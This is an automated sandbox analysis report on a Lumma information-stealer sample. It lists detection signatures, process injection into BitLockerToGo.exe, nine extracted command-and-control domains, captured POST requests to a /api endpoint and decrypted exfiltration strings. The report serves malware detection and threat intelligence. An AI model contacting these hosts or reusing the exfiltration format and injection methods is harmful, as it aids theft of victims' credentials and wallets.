Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
p37SE6gM52.exe

Overview

General Information

Sample name:p37SE6gM52.exe
renamed because original name is a hash value
Original sample name:cd68144879cf39befd5d96950a78370d.exe
Analysis ID:1519287
MD5:cd68144879cf39befd5d96950a78370d
SHA1:f22e8d8421fc6b41de89ab747c1c74b3e934ee2e
SHA256:2ca1aa726259687599cbc1eac5cb922aa247ce62a537dc1506c95855f3e4322a
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • p37SE6gM52.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\p37SE6gM52.exe" MD5: CD68144879CF39BEFD5D96950A78370D)
    • BitLockerToGo.exe (PID: 7784 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["surroundeocw.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "covvercilverow.shop", "pianoswimen.shop", "abortinoiwiam.shop"], "Build id": "tLYMe5--rui111"}
SourceRuleDescriptionAuthorStrings
p37SE6gM52.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
      00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        Process Memory Space: p37SE6gM52.exe PID: 7324JoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            1.0.p37SE6gM52.exe.7ff6fc380000.0.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
              1.2.p37SE6gM52.exe.7ff6fc380000.6.unpackJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:00:13.443829+020020546531A Network Trojan was detected192.168.2.749704104.21.37.97443TCP
                2024-09-26T10:00:14.794278+020020546531A Network Trojan was detected192.168.2.749705104.21.37.97443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:00:13.443829+020020498361A Network Trojan was detected192.168.2.749704104.21.37.97443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:00:14.794278+020020498121A Network Trojan was detected192.168.2.749705104.21.37.97443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:00:13.288579+020020560791Domain Observed Used for C2 Detected192.168.2.749704104.21.37.97443TCP
                2024-09-26T10:00:14.339044+020020560791Domain Observed Used for C2 Detected192.168.2.749705104.21.37.97443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:00:12.767379+020020560781Domain Observed Used for C2 Detected192.168.2.7594761.1.1.153UDP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: p37SE6gM52.exeAvira: detected
                Source: pianoswimen.shopAvira URL Cloud: Label: malware
                Source: surroundeocw.shopAvira URL Cloud: Label: malware
                Source: priooozekw.shopAvira URL Cloud: Label: malware
                Source: https://racedsuitreow.shop/pAvira URL Cloud: Label: malware
                Source: https://racedsuitreow.shop/apiAvira URL Cloud: Label: malware
                Source: racedsuitreow.shopAvira URL Cloud: Label: malware
                Source: https://racedsuitreow.shop/Avira URL Cloud: Label: malware
                Source: covvercilverow.shopAvira URL Cloud: Label: malware
                Source: pumpkinkwquo.shopAvira URL Cloud: Label: malware
                Source: abortinoiwiam.shopAvira URL Cloud: Label: malware
                Source: deallyharvenw.shopAvira URL Cloud: Label: malware
                Source: defenddsouneuw.shopAvira URL Cloud: Label: malware
                Source: 1.3.p37SE6gM52.exe.2766edc0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["surroundeocw.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "covvercilverow.shop", "pianoswimen.shop", "abortinoiwiam.shop"], "Build id": "tLYMe5--rui111"}
                Source: p37SE6gM52.exeReversingLabs: Detection: 52%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.5% probability
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: covvercilverow.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: surroundeocw.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: abortinoiwiam.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: pumpkinkwquo.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: priooozekw.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: deallyharvenw.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: defenddsouneuw.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: racedsuitreow.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: pianoswimen.shop
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--rui111
                Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: p37SE6gM52.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: BitLockerToGo.pdb source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: BitLockerToGo.pdbGCTL source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_02B18BC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]4_2_02B0DEE8
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02ADCD20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02ADCD20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push ebx4_2_02B0E20D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_02AED26A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000009E4h]4_2_02AED26A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebp+02h], 0000h4_2_02AFD260
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]4_2_02ADF380
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]4_2_02ADF380
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02ADF380
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000001C0h]4_2_02AE2324
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h4_2_02B19310
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah4_2_02B19310
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+04h], eax4_2_02AD131E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [eax+ecx]4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [eax]4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000004B0h]4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], ax4_2_02AEE35A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_02B16080
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 2Eh4_2_02AFB0D7
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esi+04h]4_2_02AFB0D7
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 25h4_2_02AD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, esi4_2_02AD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_02B19000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_02B19190
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_02AF71F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx4_2_02B18120
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02B1417F
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then dec eax4_2_02AD36A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 00000000h4_2_02AD36A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+24h], 525E5C56h4_2_02AFE607
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh4_2_02B12660
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]4_2_02ADD670
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h4_2_02AEF7B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_02AEF7B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx4_2_02AEF7B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], ax4_2_02AEF7B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi4_2_02AE0785
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_02B0E79E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi4_2_02AE27F9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_02AF5730
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_02AD5710
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_02AFF4B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_02AF34D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx4_2_02B18460
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [eax+01h], 00000000h4_2_02AF658F
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh4_2_02B17570
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax4_2_02AFD541
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh4_2_02AFAA90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_02AFAA90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0716B6A2h4_2_02B0DAF0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7D006057h4_2_02B0DAF0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000004B0h]4_2_02AECA10
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax4_2_02AFDB9C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_02AE0BD3
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh4_2_02B16B00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h]4_2_02ADBB40
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]4_2_02ADBB40
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_02B156C9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]4_2_02B156C9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea esi, dword ptr [esi+esi*4]4_2_02ADC810
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh4_2_02B13840
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_02AF59A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_02B09980
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h4_2_02AFF9E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [edi]4_2_02AFE9C6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_02AE9FB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax4_2_02AD9FC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax4_2_02AD9FC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]4_2_02B0FFC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+68h]4_2_02B16CF0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+1Ch], CF5AC950h4_2_02ADEC76
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax4_2_02AFDD67
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_02B12DE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+000001B8h]4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000088h]4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_02B00DD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax4_2_02AFDD67

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.7:59476 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.7:49704 -> 104.21.37.97:443
                Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.7:49705 -> 104.21.37.97:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.37.97:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.37.97:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 104.21.37.97:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 104.21.37.97:443
                Source: Malware configuration extractorURLs: surroundeocw.shop
                Source: Malware configuration extractorURLs: defenddsouneuw.shop
                Source: Malware configuration extractorURLs: racedsuitreow.shop
                Source: Malware configuration extractorURLs: priooozekw.shop
                Source: Malware configuration extractorURLs: pumpkinkwquo.shop
                Source: Malware configuration extractorURLs: deallyharvenw.shop
                Source: Malware configuration extractorURLs: covvercilverow.shop
                Source: Malware configuration extractorURLs: pianoswimen.shop
                Source: Malware configuration extractorURLs: abortinoiwiam.shop
                Source: Joe Sandbox ViewIP Address: 104.21.37.97 104.21.37.97
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: racedsuitreow.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: pianoswimen.shop
                Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
                Source: p37SE6gM52.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
                Source: p37SE6gM52.exeString found in binary or memory: https://github.com/uber-go/dig/issues/new
                Source: p37SE6gM52.exeString found in binary or memory: https://golang.org/doc/faq#nil_errorMemory
                Source: p37SE6gM52.exeString found in binary or memory: https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/prot
                Source: p37SE6gM52.exeString found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictserver
                Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/
                Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api
                Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/p
                Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B07400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_02B07400
